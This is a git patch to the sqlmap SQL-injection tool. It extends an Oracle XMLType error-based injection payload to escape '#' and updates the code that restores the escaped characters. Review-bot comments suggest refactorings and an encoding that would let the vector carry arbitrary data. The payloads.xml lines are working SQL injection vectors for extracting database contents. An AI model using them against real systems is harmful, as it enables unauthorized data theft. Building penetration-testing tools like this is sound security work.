From ac5a752b1261113969f7ddce3255dc27190f871c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 1 Mar 2012 11:59:37 +0000
Subject: [PATCH] Oracle's XMLType doesn't like '#' char too
---
 lib/core/agent.py | 3 ++-
 lib/core/option.py | 5 ++---
 lib/techniques/error/use.py | 2 +-
 xml/payloads.xml | 2 +-
 4 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/lib/core/agent.py b/lib/core/agent.py
index 07261b5fc..f45b8c500 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -217,7 +217,8 @@ class Agent:
 _ = ( ("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDSTR]", randStr),\
 ("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
- ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar)
+ ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
+ ("[HASH_REPLACE]", kb.chars.hash_)
 )
 payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
diff --git a/lib/core/option.py b/lib/core/option.py
index 7c5f3e570..91ba1ed80 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1502,9 +1502,8 @@ def __setKnowledgeBaseAttributes(flushAll=True):
 kb.chars.delimiter = randomStr(length=6, lowercase=True)
 kb.chars.start = ":%s:" % randomStr(length=3, lowercase=True)
 kb.chars.stop = ":%s:" % randomStr(length=3, lowercase=True)
- kb.chars.at = ":%s:" % randomStr(length=1, lowercase=True)
- kb.chars.space = ":%s:" % randomStr(length=1, lowercase=True)
- kb.chars.dollar = ":%s:" % randomStr(length=1, lowercase=True)
+
+ kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = (":%s:" % _ for _ in randomStr(length=4, lowercase=True))
 if flushAll:
 kb.headerPaths = {}
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index f4f923091..ab394b2ec 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
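Review bot: The pair added here, `("[HASH_REPLACE]", kb.chars.hash_)`, is the third place in this commit (with the `kb.chars.*` assignment in option.py and the `.replace()` chain in `__errorReplaceChars` in use.py) that spells out the same character-to-token mapping, and payloads.xml is the fourth, so every further character Oracle rejects means four hand-synchronised edits and one forgotten site silently corrupts retrieved data. Keeping one ordered table beside the `kb.chars` definitions, e.g. `kb.chars.replacements = ((" ", kb.chars.space), ("$", kb.chars.dollar), ("@", kb.chars.at), ("#", kb.chars.hash_))`, would let this tuple and `__errorReplaceChars` both be derived from it and leave only the XML vector to edit by hand. The `reduce` substitution itself is unchanged in behaviour; a short comment above it, `# placeholders are substituted one after another, so no replacement value may itself contain a later placeholder`, would record the ordering assumption it relies on. The enclosing Agent method starts and ends outside the hunk.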
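Review bot: The four tokens built from one `randomStr(length=4, lowercase=True)` call are only distinct if `randomStr` samples without replacement, which the hunk does not show; with four independent draws from 26 lowercase letters two of them coincide roughly one time in five (the old three separate `length=1` draws had the same flaw, about one time in nine). When, say, `kb.chars.space == kb.chars.hash_`, the payload maps both ' ' and '#' to the same `:x:` token and `__errorReplaceChars` turns every occurrence back into a space, so error-based retrieval returns corrupted data with no warning. Drawing distinct letters fixes it, e.g. `kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = (":%s:" % _ for _ in random.sample(string.ascii_lowercase, 4))`, which needs `random` and `string` in scope in option.py (not visible here). A comment such as `# one-letter tokens standing in for characters the Oracle XMLType vector cannot carry; they must be mutually distinct` would also say why these exist. `__setKnowledgeBaseAttributes` continues outside the hunk.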
@@ -180,7 +180,7 @@ def __errorReplaceChars(value):
 retVal = value
 if value:
- retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@")
+ retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#")
 return retVal
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 99d65321e..b51ff2373 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1242,7 +1242,7 @@ Formats: 0 1 1
- AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
 AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
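Review bot: `__errorReplaceChars` still carries no docstring saying that `kb.chars.space`/`dollar`/`at`/`hash_` are the one-letter tokens the Oracle XMLType vector substitutes for characters it cannot carry, which is the only reason this chain of `.replace()` calls exists; I would add `"""Restore the characters the error-based payload replaced with kb.chars.* tokens (space, '$', '@', '#') before the retrieved value is returned."""`. The ever-longer chain is also the line most likely to drift from the payload side, and a table makes the pairing explicit: `for token, char in ((kb.chars.space, " "), (kb.chars.dollar, "$"), (kb.chars.at, "@"), (kb.chars.hash_, "#")): retVal = retVal.replace(token, char)`. The restore is only correct when the four tokens are mutually distinct, which depends on how option.py generates them, not on anything in this function. The `def` line is outside the hunk.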
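Review bot: The new REPLACE() level handles only '#', while the vector still places the raw query result inside an XML element name (`CHR(60)||'[DELIMITER_START]'||...||'[DELIMITER_STOP]'||CHR(62)`), so any other character that is not legal in an XML QName — '/', '(', '&', quotes, '<' and most punctuation, presumably — would seem to break the parse, or the echoed error, the same way '#' did; worth confirming with a value such as `a/b(c)` before relying on this vector for arbitrary data. If that holds, a per-character REPLACE chain keeps growing with each report, and one encoding that yields only name-safe characters (for example hex via `RAWTOHEX(UTL_RAW.CAST_TO_RAW(...))` on the Oracle side, decoded in `__errorReplaceChars`) would close the whole class instead of one instance. The four tokens `[SPACE_REPLACE]`/`[DOLLAR_REPLACE]`/`[AT_REPLACE]`/`[HASH_REPLACE]` must also match exactly what `__errorReplaceChars` undoes, and nothing in this file enforces that.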